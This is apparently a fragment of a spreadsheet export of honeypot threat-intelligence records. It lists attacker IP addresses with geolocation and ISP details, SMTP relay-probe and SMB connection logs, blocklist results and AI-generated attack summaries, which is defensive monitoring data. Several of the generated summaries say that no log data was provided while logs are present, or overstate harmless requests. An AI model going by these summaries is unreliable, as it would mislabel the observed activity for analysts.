Date: Sat, 5 Apr 2025 17:41:21 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 5 Apr 2025 20:48:39 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 6 Apr 2025 21:43:45 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '156.244.8.69_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 7 Apr 2025 17:42:22 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 10 Apr 2025 08:42:49 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 10 Apr 2025 12:01:39 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 13 Apr 2025 10:19:56 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@seanjtucker.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@stricklissy.de&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 14 Apr 2025 06:06:49 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 15 Apr 2025 10:45:13 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 15 Apr 2025 17:36:20 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 15 Apr 2025 19:46:40 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 16 Apr 2025 07:06:46 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 16 Apr 2025 21:33:07 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;woonleslie@post.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 22 Apr 2025 04:36:19 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:c4fb:5c5b</t>
  </si>
  <si>
    <t>The attacker is trying to scan and gather information about various systems, protocols, and services on the network. They are attempting to identify potential vulnerabilities and exploit them for malicious purposes. &amp;&amp;  &amp;&amp; A malicious actor has attempted to use an SMTP service but instead of sending or receiving messages, they initiated a connection and sent a QUIT command, which is typically used for legitimate connections, suggesting they were trying to establish a connection without actually intending to send email. This behavior is indicative of reconnaissance or probing activities. The lack of actual data being sent suggests the actor was likely testing the service's presence.</t>
  </si>
  <si>
    <t xml:space="preserve">**Port Scanning** &amp;&amp; </t>
  </si>
  <si>
    <t>8dfd2f15de2ca7d9d02f769d8e3de466</t>
  </si>
  <si>
    <t>117.255.30.42</t>
  </si>
  <si>
    <t>::ffff:75ff:1e2a</t>
  </si>
  <si>
    <t>f75de284fea11ea1188b34543f273ecb</t>
  </si>
  <si>
    <t>117.233.135.4</t>
  </si>
  <si>
    <t>::ffff:75e9:8704</t>
  </si>
  <si>
    <t>1befaab9bf7e7048f13330b2bb97178f</t>
  </si>
  <si>
    <t>59.184.65.130</t>
  </si>
  <si>
    <t>::ffff:3bb8:4182</t>
  </si>
  <si>
    <t>bbcebfa2d00f0d423c1e021c4aa373a9</t>
  </si>
  <si>
    <t>117.242.219.215</t>
  </si>
  <si>
    <t>::ffff:75f2:dbd7</t>
  </si>
  <si>
    <t>582349858b69f5d9c65cdcfea9496c15</t>
  </si>
  <si>
    <t>185.209.196.150</t>
  </si>
  <si>
    <t>50.0987</t>
  </si>
  <si>
    <t>8.63226</t>
  </si>
  <si>
    <t>31173 Services Germany</t>
  </si>
  <si>
    <t>2017-06-22</t>
  </si>
  <si>
    <t>::ffff:b9d1:c496</t>
  </si>
  <si>
    <t>90a3fc217d00b995cbb2db58c3698df3</t>
  </si>
  <si>
    <t>117.233.136.46</t>
  </si>
  <si>
    <t>::ffff:75e9:882e</t>
  </si>
  <si>
    <t>aa241f3f61d0118de5f541269f639ae1</t>
  </si>
  <si>
    <t>117.242.17.63</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:75f2:113f</t>
  </si>
  <si>
    <t>3b9d1e2d04cc35a707568d3d9def4a0a</t>
  </si>
  <si>
    <t>114.134.22.156</t>
  </si>
  <si>
    <t>Agra</t>
  </si>
  <si>
    <t>Agra (Sanjay Place)</t>
  </si>
  <si>
    <t>1279259</t>
  </si>
  <si>
    <t>282002</t>
  </si>
  <si>
    <t>27.2004</t>
  </si>
  <si>
    <t>78.0045</t>
  </si>
  <si>
    <t>::ffff:7286:169c</t>
  </si>
  <si>
    <t>93a82759ecf4e1b52cb33adb4c3b67e6</t>
  </si>
  <si>
    <t>103.17.51.33</t>
  </si>
  <si>
    <t>27.2049</t>
  </si>
  <si>
    <t>78.0072</t>
  </si>
  <si>
    <t>U P Infomax Pvt Ltd</t>
  </si>
  <si>
    <t>U P Infomax PVT LTD</t>
  </si>
  <si>
    <t>::ffff:6711:3321</t>
  </si>
  <si>
    <t>06ce3327118d66b3a3e80e9e0b144baf</t>
  </si>
  <si>
    <t>210.18.138.16</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H23</t>
  </si>
  <si>
    <t>::ffff:d212:8a10</t>
  </si>
  <si>
    <t>cb4e9921f7a744903a06544515b8ade6</t>
  </si>
  <si>
    <t>120.56.109.118</t>
  </si>
  <si>
    <t>::ffff:7838:6d76</t>
  </si>
  <si>
    <t>0e0d1782d2b594b9205034d965797047</t>
  </si>
  <si>
    <t>117.232.7.3</t>
  </si>
  <si>
    <t>::ffff:75e8:703</t>
  </si>
  <si>
    <t>463a31467f9543964ac6fc159cdda60f</t>
  </si>
  <si>
    <t>117.193.228.220</t>
  </si>
  <si>
    <t>::ffff:75c1:e4dc</t>
  </si>
  <si>
    <t>0ef230935e459cb85198f693fa7bc5d1</t>
  </si>
  <si>
    <t>117.242.238.35</t>
  </si>
  <si>
    <t>::ffff:75f2:ee23</t>
  </si>
  <si>
    <t>c0fc051c9c96add9e708db28231e3025</t>
  </si>
  <si>
    <t>120.61.249.47</t>
  </si>
  <si>
    <t>::ffff:783d:f92f</t>
  </si>
  <si>
    <t>50767345ed70e1d000b4297fccd437a5</t>
  </si>
  <si>
    <t>14.192.192.123</t>
  </si>
  <si>
    <t>MY</t>
  </si>
  <si>
    <t>Malaysia</t>
  </si>
  <si>
    <t>Kuala Lumpur</t>
  </si>
  <si>
    <t>WP. Kuala Lumpur</t>
  </si>
  <si>
    <t>Kuala Lumpur (Kuala Lumpur City Centre)</t>
  </si>
  <si>
    <t>1735161</t>
  </si>
  <si>
    <t>50088</t>
  </si>
  <si>
    <t>3.15823</t>
  </si>
  <si>
    <t>101.713</t>
  </si>
  <si>
    <t>9534</t>
  </si>
  <si>
    <t>Maxis Broadband Sdn Bhd</t>
  </si>
  <si>
    <t>Maxis Broadband Sdn.Bhd</t>
  </si>
  <si>
    <t>::ffff:ec0:c07b</t>
  </si>
  <si>
    <t>b9c7d4149ec0fb581df896d858c4ee8a</t>
  </si>
  <si>
    <t>181.188.137.66</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>BO</t>
  </si>
  <si>
    <t>Bolivia</t>
  </si>
  <si>
    <t>L</t>
  </si>
  <si>
    <t>La Paz Department</t>
  </si>
  <si>
    <t>Pedro Domingo Murillo Province</t>
  </si>
  <si>
    <t>La Paz</t>
  </si>
  <si>
    <t>3911925</t>
  </si>
  <si>
    <t>-16.4897</t>
  </si>
  <si>
    <t>-68.1193</t>
  </si>
  <si>
    <t>27882</t>
  </si>
  <si>
    <t>Telefónica Celular de Bolivia S.A.</t>
  </si>
  <si>
    <t>Telefónica Celular de Bolivia S.A</t>
  </si>
  <si>
    <t>::ffff:b5bc:8942</t>
  </si>
  <si>
    <t>3a4f5f98b1ca9560864697bf42fba0f1</t>
  </si>
  <si>
    <t>103.165.197.242</t>
  </si>
  <si>
    <t>SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>::ffff:67a5:c5f2</t>
  </si>
  <si>
    <t>86c3f174d09b90d24d64b7228465a87f</t>
  </si>
  <si>
    <t>117.247.94.36</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;55833&amp;&amp;55838</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,55181)}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,55424)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,56882)}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,57397)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.94.36,54102)}</t>
  </si>
  <si>
    <t>::ffff:75f7:5e24</t>
  </si>
  <si>
    <t>c0286b5e7f34ca8fdcafc76c3a6e47c2</t>
  </si>
  <si>
    <t>190.77.72.244</t>
  </si>
  <si>
    <t>NA&amp;&amp;190-77-72-244.dyn.dsl.cantv.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Miranda</t>
  </si>
  <si>
    <t>Chacao Municipality</t>
  </si>
  <si>
    <t>Caracas (Los Palos Grandes)</t>
  </si>
  <si>
    <t>10.4966</t>
  </si>
  <si>
    <t>-66.8446</t>
  </si>
  <si>
    <t>8048</t>
  </si>
  <si>
    <t>CANTV Servicios, Venezuela</t>
  </si>
  <si>
    <t>::ffff:be4d:48f4</t>
  </si>
  <si>
    <t>9a9a33efe02da74dc499e4d47e7ef4cf</t>
  </si>
  <si>
    <t>187.62.86.222</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>Atibaia</t>
  </si>
  <si>
    <t>3471335</t>
  </si>
  <si>
    <t>-23.1169</t>
  </si>
  <si>
    <t>-46.5503</t>
  </si>
  <si>
    <t>269715</t>
  </si>
  <si>
    <t>INFINITYGO TELECOM LTDA</t>
  </si>
  <si>
    <t>Infinitygo Telecom Ltda</t>
  </si>
  <si>
    <t>::ffff:bb3e:56de</t>
  </si>
  <si>
    <t>The attacker is trying to scan and exploit various network services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. They are attempting to gather information about the network infrastructure, identify potential vulnerabilities, and gain unauthorized access to sensitive data. &amp;&amp; No log data provided to analyze, so there is nothing to describe regarding possible malicious activity.</t>
  </si>
  <si>
    <t>Port scanning &amp;&amp; There is no log data provided. Please provide the actual log data for analysis.</t>
  </si>
  <si>
    <t>04a258bdb8adbc15811f46a86c4de757</t>
  </si>
  <si>
    <t>118.232.125.148</t>
  </si>
  <si>
    <t>118-232-125-148.dynamic.kbronet.com.tw&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:76e8:7d94</t>
  </si>
  <si>
    <t>c9f60cedacc67d35ee0798de40742265</t>
  </si>
  <si>
    <t>117.200.103.179</t>
  </si>
  <si>
    <t>::ffff:75c8:67b3</t>
  </si>
  <si>
    <t>bd1fb711d9f2e29445748e22fb0af51f</t>
  </si>
  <si>
    <t>122.166.102.136</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43</t>
  </si>
  <si>
    <t>14147&amp;&amp;1433</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:7aa6:6688</t>
  </si>
  <si>
    <t>2fae66724c5baf678bde2d57f69e6b54</t>
  </si>
  <si>
    <t>185.97.25.167</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_HC1</t>
  </si>
  <si>
    <t>443&amp;&amp;8443&amp;&amp;44668</t>
  </si>
  <si>
    <t>52</t>
  </si>
  <si>
    <t>Královéhradecký kraj</t>
  </si>
  <si>
    <t>Hradec Králové District</t>
  </si>
  <si>
    <t>Hradec Králové (Slezské Předměstí)</t>
  </si>
  <si>
    <t>3074967</t>
  </si>
  <si>
    <t>500 03</t>
  </si>
  <si>
    <t>50.2121</t>
  </si>
  <si>
    <t>15.8491</t>
  </si>
  <si>
    <t>204666</t>
  </si>
  <si>
    <t>Jiri Tlapak</t>
  </si>
  <si>
    <t>STEN.cz s.r.o.</t>
  </si>
  <si>
    <t>2015-04-21</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '5.253.43.207', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b961:19a7</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze. 
Activity description unavailable due to lack of information. &amp;&amp; No log data provided, unable to analyze.</t>
  </si>
  <si>
    <t>There is no log data provided. Please provide the actual log data for me to analyze. &amp;&amp; I'd be happy to help analyze the log data! However, it seems like there's no data provided. Please share the actual log data, and I'll do my best to identify the type of attack in a short phrase (max 2 words).</t>
  </si>
  <si>
    <t>6781176b7719c3a24a609d5163a98b6c</t>
  </si>
  <si>
    <t>117.232.15.119</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>::ffff:75e8:f77</t>
  </si>
  <si>
    <t>f2055030a2f23dbfddfb621d1a9e18d7</t>
  </si>
  <si>
    <t>123.176.186.144</t>
  </si>
  <si>
    <t>NA&amp;&amp;mcn-c6d86144.miyazaki-catv.ne.jp</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_HC1</t>
  </si>
  <si>
    <t>45</t>
  </si>
  <si>
    <t>Miyazaki</t>
  </si>
  <si>
    <t>1856717</t>
  </si>
  <si>
    <t>31.9167</t>
  </si>
  <si>
    <t>131.417</t>
  </si>
  <si>
    <t>17939</t>
  </si>
  <si>
    <t>miyazaki cabletelevision network Co.,LTD</t>
  </si>
  <si>
    <t>miyazaki cabletelevision network Co., LTD</t>
  </si>
  <si>
    <t>MCN</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '38.60.209.6', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:7bb0:ba90</t>
  </si>
  <si>
    <t>A malicious actor is attempting to access the root directory of a service using a GET request, potentially for reconnaissance or data retrieval purposes. The request also specifies supported content types, which could be used to deliver malware or exploit vulnerabilities. The Host header indicates the attacker's IP address is likely probing the service. &amp;&amp; The user is attempting to access the root directory of a web server with an encrypted connection, possibly looking for sensitive information or exploiting vulnerabilities. The request includes accepting plain and HTML text formats, which could be used to deliver malicious content. This behavior may indicate reconnaissance or a potential attack on the system.</t>
  </si>
  <si>
    <t>4700ea369f7c595c1817049730fdaaf1</t>
  </si>
  <si>
    <t>103.110.249.96</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>133661</t>
  </si>
  <si>
    <t>Netplus Broadband Services Private Limited</t>
  </si>
  <si>
    <t>Lynx Inc</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,13687)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,14032)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,14033)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,17699)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,17718)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,62458)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,58767)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,58818)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,53241)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,27839)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,27889)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,27906)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,42566)}&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,42917)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (103.110.249.96,30721)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:676e:f960</t>
  </si>
  <si>
    <t>85c7706d961c98809f803730f5e186c2</t>
  </si>
  <si>
    <t>5.239.240.16</t>
  </si>
  <si>
    <t>Semnan</t>
  </si>
  <si>
    <t>Shahrestān-e Shāhrūd</t>
  </si>
  <si>
    <t>Shahrud</t>
  </si>
  <si>
    <t>135423</t>
  </si>
  <si>
    <t>36.4183</t>
  </si>
  <si>
    <t>54.9692</t>
  </si>
  <si>
    <t>Telecommunication Company of Semnan</t>
  </si>
  <si>
    <t>2012-09-07</t>
  </si>
  <si>
    <t>::ffff:5ef:f010</t>
  </si>
  <si>
    <t>69ed13a8e2953a6a8ee7a65c61af2205</t>
  </si>
  <si>
    <t>220.132.90.171</t>
  </si>
  <si>
    <t>220-132-90-171.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>2358&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>None&amp;&amp;connection&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>::ffff:dc84:5aab</t>
  </si>
  <si>
    <t>042e8f4d685e6bb2d59565bc0a29aa69</t>
  </si>
  <si>
    <t>117.221.200.94</t>
  </si>
  <si>
    <t>::ffff:75dd:c85e</t>
  </si>
  <si>
    <t>f81ff493f3b798259220cff832c83fc9</t>
  </si>
  <si>
    <t>124.123.96.39</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;15656&amp;&amp;445&amp;&amp;60592</t>
  </si>
  <si>
    <t>55577</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,52416)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,55497)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,55789)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,61032)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,61739)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,64462)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,65020)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,53262)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,63050)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,51159)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,51675)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,60294)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,60592)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,54801)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,55241)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,50406)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,50872)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,57939)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,58561)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,57138)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,57200)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,63030)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,63687)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,59740)}&amp;&amp;{Data_SMB:Incoming connection (124.123.96.39,60000)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:7c7b:6027</t>
  </si>
  <si>
    <t>dd052789dc72c914739a49e36faa605a</t>
  </si>
  <si>
    <t>117.196.119.85</t>
  </si>
  <si>
    <t>::ffff:75c4:7755</t>
  </si>
  <si>
    <t>6a49974de41dd512b5b33f81a846fa98</t>
  </si>
  <si>
    <t>59.94.135.135</t>
  </si>
  <si>
    <t>::ffff:3b5e:8787</t>
  </si>
  <si>
    <t>c037748eae40d7cd0f3049adbbc71c9e</t>
  </si>
  <si>
    <t>23.234.68.68</t>
  </si>
  <si>
    <t>NA&amp;&amp;static-23-234-68-68.cust.tzulo.com</t>
  </si>
  <si>
    <t>Colorado</t>
  </si>
  <si>
    <t>Denver</t>
  </si>
  <si>
    <t>5419384</t>
  </si>
  <si>
    <t>80208</t>
  </si>
  <si>
    <t>39.7392</t>
  </si>
  <si>
    <t>-104.99</t>
  </si>
  <si>
    <t>Jayson Batbatan</t>
  </si>
  <si>
    <t>2013-09-26</t>
  </si>
  <si>
    <t>::ffff:17ea:4444</t>
  </si>
  <si>
    <t>1fb959146828d37d3b801f69dc6ea283</t>
  </si>
  <si>
    <t>117.233.233.216</t>
  </si>
  <si>
    <t>::ffff:75e9:e9d8</t>
  </si>
  <si>
    <t>dd73574cbdeb196fe23588d24cd43631</t>
  </si>
  <si>
    <t>24.226.184.97</t>
  </si>
  <si>
    <t>24-226-184-97.resi.cgocable.ca&amp;&amp;NA</t>
  </si>
  <si>
    <t>QC</t>
  </si>
  <si>
    <t>Quebec</t>
  </si>
  <si>
    <t>Montréal</t>
  </si>
  <si>
    <t>Montreal</t>
  </si>
  <si>
    <t>6077243</t>
  </si>
  <si>
    <t>H4X</t>
  </si>
  <si>
    <t>45.5019</t>
  </si>
  <si>
    <t>-73.5674</t>
  </si>
  <si>
    <t>11290</t>
  </si>
  <si>
    <t>Cogeco Connexion inc</t>
  </si>
  <si>
    <t>Cogeco Communications Holdings, Inc.</t>
  </si>
  <si>
    <t>1997-08-20</t>
  </si>
  <si>
    <t>CC-3272</t>
  </si>
  <si>
    <t>2019-09-30</t>
  </si>
  <si>
    <t>::ffff:18e2:b861</t>
  </si>
  <si>
    <t>4872f3746ae024cd31f4d295a356d600</t>
  </si>
  <si>
    <t>168.126.255.174</t>
  </si>
  <si>
    <t>1994-04-20</t>
  </si>
  <si>
